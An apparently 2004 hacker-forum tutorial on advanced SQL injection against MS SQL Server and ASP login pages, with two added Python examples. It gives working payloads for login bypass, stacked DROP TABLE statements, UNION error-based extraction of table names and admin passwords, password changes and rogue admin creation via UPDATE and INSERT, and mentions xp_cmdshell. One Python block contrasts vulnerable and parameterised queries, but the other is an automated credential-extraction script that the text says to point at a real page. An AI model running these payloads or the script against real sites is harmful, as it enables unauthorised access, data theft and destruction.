ADVANCED SQL INJECTIONS

AUTHOR: SUBBY
http://hackerlounge.no-ip.com
http://www.hackerlounge.com

DISCLAIMER

Once again, I am NOT responsible for the information provided in this tutorial. Do not use it with malice; it is for web developers and admins who deal with an SQL server. This tutorial may be hosted on any other site, as long as it remains unmodified in any way, shape or form. I DO NOT take responsibility for what you do with this information.

ADVANCED SQL

This is a paper on advanced SQL injections. It is presumed that you have knowledge of basic authorisation bypass of SQL login pages using query strings, and basic knowledge of SQL. Read my "Beginners Guide To SQL Injections" before you read this tutorial, as it requires the knowledge raised in that paper.

Index

1.1- INTRODUCTION
1.2- BACKGROUND INFORMATION
1.3- BASIC OVERVIEW
2.1- BREAKING THE QUOTES
2.2- UNION TABLES AND ODBC ERRORS
3.1- GAINING TABLE STRUCTURE
3.2- UNION THROUGH INTEGER
3.3- NUMERIC BYPASS
3.4- INSERTING TABLE DATA
3.5- INSERTING SYNTAX ERRORS
3.6- HOW TO KNOW IF INJECTION IS SUCCESSFUL
3.7- 'SA' MASTER USER

1.1- INTRODUCTION

This document raises many issues concerning the security of SQL servers, in particular MS SQL Server. Much of the information also applies to other SQL databases, such as Oracle, although the error messages and some of the syntax differ. This document will show how an attacker can gain access to ANY user through the login pages of Active Server Pages (.asp) applications that build their SQL statements from user input.

1.2- BACKGROUND INFORMATION

I will not go into too much background information, as most of it has been raised in my previous paper. SQL is the language used to communicate with a relational database. We will be raising many methods of attack in this paper, the main one being the injected query: a string supplied through a form field or URL parameter that the page pastes into its own SQL statement, so that the server ends up running SQL the attacker chose rather than the SQL the developer intended. The main type of attack we will be using in this paper relies on the server's detailed error messages.
1.3- BASIC OVERVIEW

I am only going to touch on this, because you should already have a basic understanding of SQL, SQL clauses, SQL queries and SQL statements. Here is a brief example of an SQL statement:

SELECT product_name, product_cost, product_id FROM products

Using our SELECT clause we have selected, from the products table, the product_name, product_cost and product_id columns. We might get the following results:

Name      Cost  ID
Product1  17    3
Product2  123   2
Product3  45    1
Product4  134   1
Product5  56    3

We note that one of these columns is a string and two are numbers: product_name is a string, product_cost and product_id are numbers. Besides the obvious fact that the cost and ID are numeric, there is one other significant difference: in an SQL statement, string values are written inside single quotes whilst numbers are not. We will find out why this matters shortly.

Now let us expand this statement and add more clauses and conditions:

SELECT product_name, product_cost, product_id FROM products WHERE product_cost > 20 AND product_id = 1

This will again select the name, cost and ID from the products table. However, it will only return the rows whose product_cost is more than 20 and whose product_id is 1. We might get the following results:

Name      Cost  ID
Product3  45    1
Product4  134   1

Our conditions are met: the product cost is greater than 20 and the ID is 1.

2.1- BREAKING THE QUOTES

Now we will perform a simple advanced SQL injection. Confused? Good. For this type of injection we will need to break out of the quotes. We know that when a string is submitted to an .asp login page, the page typically builds its query by adding a quote to the start and end of the string and pasting the result into the statement.
For example:

Login= William
Pass= will

Our SQL statement would look like this:

SELECT * FROM table1 WHERE login='William' AND pass='will'

This is fine, and our login would be successful. But suppose we were to "break through the quotes" of the string:

Login= Will'iam
Pass= will

Now we would get an error message, something along the lines of:

Server Error: Incorrect syntax near 'iam'

See how we broke out of the quotes: the server took login='Will' as the value and then tripped over the stray text iam' that followed it. Now let us specify another input:

Login= will'; drop table pass--
Pass=

Now this is interesting. The ";" tells the SQL server that the current statement has ended and that another one follows. It is like the period "." character in English. The "drop table pass" will drop the pass table, and the "--" comments out the rest of the line, so the closing quote and the AND pass='' condition that the page appends are never parsed. The -- is needed for the injected statement to terminate without a syntax error. (MS SQL Server runs such stacked statements; some other databases and drivers refuse a second statement in one call, so this particular trick only works where the server allows it.)

Now, if the target is vulnerable to SQL injection (see my previous paper), one might be able to log on to the application as any account whose user name one knows, with no password at all, using the following injection:

Username: Username'--

The resulting statement is SELECT * FROM table1 WHERE login='Username'-- AND pass='...', and since everything after -- is a comment, the password check never runs.

2.2- UNION TABLES AND ODBC ERRORS

MS SQL Server has very detailed error messages, some would say a little too detailed, and they are right. When the application connects through the ODBC driver, those errors are handed back to the web page in full, and we can use them to get access to the server under any user name we want; we can even create users through a few SQL statements. However, this is not as simple as it may sound. An attacker needs to know the structure of the database in order to gain access to it; otherwise they have a slim-to-none chance of getting in. There are many ways to learn that structure.

3.1- GAINING TABLE STRUCTURE

The simplest method of gaining information about the table structure is by viewing the source of the Active Server Page.
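The login query of section 2.1, written out as an added Python example with SQLite standing in for the ASP page's database (this is not code from the original paper). vulnerable_login pastes the raw input between quotes exactly as the page does, so Username'-- authenticates without a password and Will'iam produces a syntax error; safe_login performs the same check with bound parameters, which is the fix. The table1 layout and the William/will row are constructed for the demonstration.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample login table standing in for section 2.1's table1."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE table1 (login TEXT, pass TEXT)")
    conn.execute("INSERT INTO table1 VALUES ('William', 'will')")
    conn.execute("CREATE TABLE pass (id INTEGER)")  # a second table, for the DROP attempt
    return conn


def vulnerable_login(conn: sqlite3.Connection, login: str, password: str):
    """Build the statement the way the .asp page does: wrap the raw input in
    quotes and paste it into the SQL text. Returns the matched login name,
    None when the credentials do not match, or 'error: ...' when the input
    breaks the quoting and the database rejects the statement."""
    sql = ("SELECT login FROM table1 WHERE login='" + login
           + "' AND pass='" + password + "'")
    try:
        row = conn.execute(sql).fetchone()
    except (sqlite3.Error, sqlite3.Warning) as exc:
        # sqlite3 reports the broken syntax, just as the ODBC driver does.
        # It also refuses to run a second statement from execute(), so the
        # "; drop table pass--" payload ends up here; SQL Server would run it.
        return "error: " + str(exc)
    return row[0] if row else None


def safe_login(conn: sqlite3.Connection, login: str, password: str):
    """Same check with bound parameters: the values travel separately from the
    SQL text, so quotes, semicolons and -- in the input are just characters."""
    row = conn.execute(
        "SELECT login FROM table1 WHERE login=? AND pass=?", (login, password)
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    for login, pw in [("William", "will"), ("Will'iam", "will"),
                      ("William'--", ""), ("will'; drop table pass--", "")]:
        print(repr(login), "->", vulnerable_login(db, login, pw),
              "| parameterised:", safe_login(db, login, pw))
```

The bypass works because the comment swallows the page's own trailing quote and password condition; the parameterised version never lets the input reach the SQL parser, so the same strings simply fail to match a row.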
We might come across the following code:

[code]
function checkRequired() {
    // Refuse to submit the form until every required field is filled in.
    if (!document.Form1.UserID.value.length ||
        !document.Form1.Password.value.length ||
        !document.Form1.ConfirmPassword.value.length) {
        alert('You have not completed all required fields:\n');
        return false;
    }
    // Both password fields must match before the form is submitted.
    if (document.Form1.Password.value == document.Form1.ConfirmPassword.value) {
        return true;
    }
    alert('Password and confirm password are not the same:\n');
    return false;
}
[/code]

This tells us that the user name field is called 'UserID' and the password field is called 'Password', and in a hastily written application the columns of the login table very often carry the same names. So now the attacker has a good guess at the basic structure of your database, which they can then use in their injected query strings to gain access to it.

3.2- UNION THROUGH INTEGER

While searching, one might come across a URL that looks something like the following example:

www.somesite.com/index.asp?ID=1337

*NOTE* ID=1 is a completely different page to that of ID=2.

In the example, 1337 is the integer. What a hacker will then do is use the UNION clause to union the integer "1337" with another value from the database. What the attacker wishes to achieve in the next statement is to get the TABLE names, so he or she can then manipulate the database to his or her own needs. An attacker might use the following statement:

www.somesite.com/index.asp?ID=1337 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

We note that INFORMATION_SCHEMA.TABLES lists every table the current database user can see. Now let us run through this bit by bit. Using our clause, we are selecting the top table name from the INFORMATION_SCHEMA.TABLES view. We will get the following ODBC error:

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Table' to a column of data type int.

This tells us that the first table in INFORMATION_SCHEMA.TABLES is 'Table'.
The way it works is that SQL Server tries to convert the nvarchar value so that it can be unioned with the integer ID column, fails, and reports the offending value in the error message. (This assumes the page's own query returns a single column; if it returns more, the injected SELECT must supply the same number of columns, padded with NULL, or SQL Server complains that the UNION operands have different numbers of columns instead.) And we go further:

www.somesite.com/index.asp?ID=1337 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25login%25'--

What the attacker is doing here is using the LIKE clause. It is selecting the top table name where the table name contains "login". We get the following error message:

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin_login' to a column of data type int.

%25 is the URL encoding of the % character, so the query the server sees is LIKE '%login%', and the first table matching the criteria is spewed out, in this case admin_login.

Now let us get the first name in the admin_login table. We do that by injecting the following SQL statement into the URL:

www.somesite.com/index.asp?ID=1337 UNION SELECT TOP 1 login_name FROM admin_login--

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '4DM1N' to a column of data type int.

Now we see that the first username in the table admin_login is '4DM1N'. But what use is a username if there is no password?

www.somesite.com/index.asp?ID=1337 UNION SELECT TOP 1 password FROM admin_login WHERE login_name='4DM1N'--

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'haxxOre' to a column of data type int.

SUCCESS! We may now log in as admin, using the username 4DM1N and the password haxxOre.

3.3- NUMERIC BYPASS

In the previous example, if the password had been a numeric string, that is, made up only of the characters 0-9, we would not have got the error. The reason is that a string such as '1337' converts to an integer without complaint, so the UNION succeeds silently: the value is never printed in an ODBC error, and the page either shows nothing useful or, if it cannot cope with the extra row, returns a generic HTTP error. However, there is a very simple way to bypass this.
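The next paragraph spells out the bypass itself; here first is the whole walk of sections 3.2 and 3.3, written out as an added Python example that is not code from the original paper. It builds the injected tails, URL-encodes them the way the paper does by hand (%25, %2b, %20), pulls the leaked value out of the ODBC error wherever it appears in the response (including inside an HTML comment, which matters for section 3.6), and falls back to the convert() wrapper when a numeric value converts silently. It goes one step beyond the paper by excluding already-seen names with NOT IN, so that TOP 1 returns the next table on each request. The somesite.com URL, the admin_login table and the values are the paper's hypothetical ones, replayed by a constructed fake_page function that stands in for the real server; nothing here touches a network.

```python
import re
from urllib.parse import quote

# Hypothetical target from the paper (section 3.2); no real server is contacted.
BASE_URL = "http://www.somesite.com/index.asp?ID=1337"

ODBC_ERROR = re.compile(
    r"Syntax error converting the nvarchar value '(.*?)' to a column of data type int\.",
    re.IGNORECASE | re.DOTALL,
)


def leaked_value(page: str):
    """Return the value SQL Server leaked in a conversion error, or None.
    Searches the whole response, so an error hidden in an HTML comment is found too."""
    m = ODBC_ERROR.search(page)
    return m.group(1) if m else None


def union_payload(expr: str, source: str, where: str = "") -> str:
    """The paper's injected tail: UNION SELECT TOP 1 <expr> FROM <source> [WHERE ...]--"""
    tail = f" UNION SELECT TOP 1 {expr} FROM {source}"
    if where:
        tail += f" WHERE {where}"
    return tail + "--"


def force_error(column: str) -> str:
    """Section 3.3's numeric bypass: appending text makes convert(int, ...) fail,
    so even an all-digit value is echoed back in the error message."""
    return f"convert(int, {column}+' hackers')"


def to_url(tail: str) -> str:
    """URL-encode the tail: %, +, space and ' become %25, %2B, %20, %27.
    A bare + would be decoded as a space by the server, hence the paper's %2b."""
    return BASE_URL + quote(tail, safe="")


def walk_tables(fetch, like: str = "", limit: int = 20) -> list:
    """Generalises the paper's single TOP 1 query: after each hit, exclude the
    names already seen with NOT IN so TOP 1 yields the next table. Stops when
    the page comes back without an error (or repeats itself)."""
    found = []
    while len(found) < limit:
        conds = []
        if like:
            conds.append(f"TABLE_NAME LIKE '%{like}%'")
        if found:
            conds.append("TABLE_NAME NOT IN (" + ",".join(f"'{t}'" for t in found) + ")")
        tail = union_payload("TABLE_NAME", "INFORMATION_SCHEMA.TABLES", " AND ".join(conds))
        value = leaked_value(fetch(tail))
        if value is None or value in found:
            break
        found.append(value)
    return found


def read_value(fetch, column: str, table: str, where: str = ""):
    """Read one cell. Try the column as-is first; if SQL Server converted it
    silently (a numeric string), retry with the forcing wrapper and strip the
    marker text from what comes back."""
    value = leaked_value(fetch(union_payload(column, table, where)))
    if value is not None:
        return value
    value = leaked_value(fetch(union_payload(force_error(column), table, where)))
    if value is not None and value.endswith(" hackers"):
        return value[: -len(" hackers")]
    return value


def fake_page(tail: str) -> str:
    """Constructed replay of the paper's responses, standing in for an HTTP fetch
    of to_url(tail). The admin's password is the numeric 1337 (section 3.3)."""
    def err(v):
        return ("<html><!-- [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error "
                f"converting the nvarchar value '{v}' to a column of data type int. --></html>")
    normal = "<html>i am unhackable</html>"
    if "INFORMATION_SCHEMA.TABLES" in tail:
        return normal if "NOT IN ('admin_login')" in tail else err("admin_login")
    if "login_name FROM admin_login" in tail:
        return err("4DM1N")
    if "convert(int, password+' hackers') FROM admin_login" in tail:
        return err("1337 hackers")
    return normal   # plain 'password' converts cleanly: no error, nothing leaked


if __name__ == "__main__":
    tables = walk_tables(fake_page, like="login")
    user = read_value(fake_page, "login_name", tables[0])
    print(tables, user, read_value(fake_page, "password", tables[0], f"login_name='{user}'"))
```

To run it against a real page, replace fake_page with a function that requests to_url(tail) and returns the full response, headers and body together, as one string; leaked_value will find the error wherever the page put it.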
Even if the password was numeric, we would still have got the username of the admin, so let us go from there (and presume the password for '4DM1N' is '1337'). We would use the following SQL statement:

www.somesite.com/index.asp?ID=1337 UNION SELECT TOP 1 convert(int, password%2b'%20hackers') FROM admin_login WHERE login_name='4DM1N'--

Now I know a lot of people will be going WTF? right now, so I will s-p-e-l-l it out. We concatenate the numeric password with a piece of text, so that the value SQL Server tries to convert is a string that is no longer a valid integer. We inserted the plus (+) sign to join the two values; in T-SQL, + on strings is concatenation. *NOTE* the ASCII code for + is 0x2b and for space is 0x20, so they are written %2b and %20 in the URL; a bare + in a query string would be decoded as a space, which is why it must be encoded. Therefore, we will get the following ODBC error:

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '1337 hackers' to a column of data type int.

We clearly see here that the password is 1337, and can now log in as 4DM1N with the password 1337.

3.4- INSERTING TABLE DATA

It is possible for the attacker to change the password of an existing admin using the UPDATE statement, or even create a new user using the INSERT statement (this is why it is very important for the attacker to know the structure of the database):

www.somesite.com/index.asp?ID=1337; UPDATE admin_login SET password='haxxOre' WHERE login_name='4DM1N'--

The password for '4DM1N' will be changed, even though we don't know the existing password.

www.somesite.com/index.asp?ID=1337; INSERT INTO admin_login (login_id, login_name, password, details) VALUES (98989,'4DM1N2','haxx','none')--

This will create a new user '4DM1N2' with the password 'haxx'. The login ID will be 98989 (it is best to choose something obscure so it will not already be in use). We would now be able to log in to the application as admin with the username 4DM1N2 and the password haxx.

3.5- INSERTING SYNTAX ERRORS

Without knowing much about the database structure, the attacker may deliberately inject strings that cause a syntax error.
Some of these will return very useful information, some will not:

' BadValue'
'BadValue '
' OR '
' OR ;
9,9,9

[author unknown]

3.6- HOW TO KNOW IF INJECTION IS SUCCESSFUL

Hackers hope that when they inject a parameter, the server will produce a nice ODBC error. This is not always the case; however, that does not mean that injection has not occurred or that the server is not vulnerable. Even though the web developers have tested the server ten times over, they may have left out one harmful parameter, so the hacker must try everything, mess with anything and hope that the developers have missed something. If the SQL server produces an error of some sort, more often than not injection was successful, but it is not always obvious to the attacker: they must look everywhere for the error messages, which can sometimes prove very difficult. The first thing you should do is check the source of the site and search for things like:

- ODBC
- SQL Server
- nvarchar
- error
- syntax

It is not unusual for developers to hide error messages, so check the headers! As strange as this may seem, many applications do it. Look for linked pages. The developers may also use page redirects to hide the error messages from attackers. I have seen many websites which, where you would expect an error message, come up with witty comments like "=) how about...no" or "i am unhackable". This, however, is not the case =) the error message was in the source. Check everywhere!

3.7- 'SA' MASTER USER

There is a built-in administrative login named 'sa', which is much like a root account, and on many installations it was left with no password. You may want to mess around with this. Some sites even show that the username is active in their source!

*NOTE* There is a way to run arbitrary commands remotely through the MS SQL Server port. This is by using stored procedures such as xp_cmdshell, xp_msver, sp_password, sp_tables, xp_regdeletekey and many more. These ship with MS SQL Server.
*NOTE* xp here stands for extended stored procedure; it is not associated in any way with Microsoft's Windows XP, so do not make the mistake of thinking these come with the OS. I am not going to comment on how to hack with these, as quite frankly I cannot be bothered, and it is another whole paper.

I hope you liked my tutorial; please send any feedback.

How to get in contact with me

If you have any feedback let me know via hotaspie@hotmail.com or the TGS forums located at http://www.hackerlounge.com or http://hackerlounge.no-ip.com

AUTHOR: Subby
http://hackerlounge.no-ip.com
Copyright 2004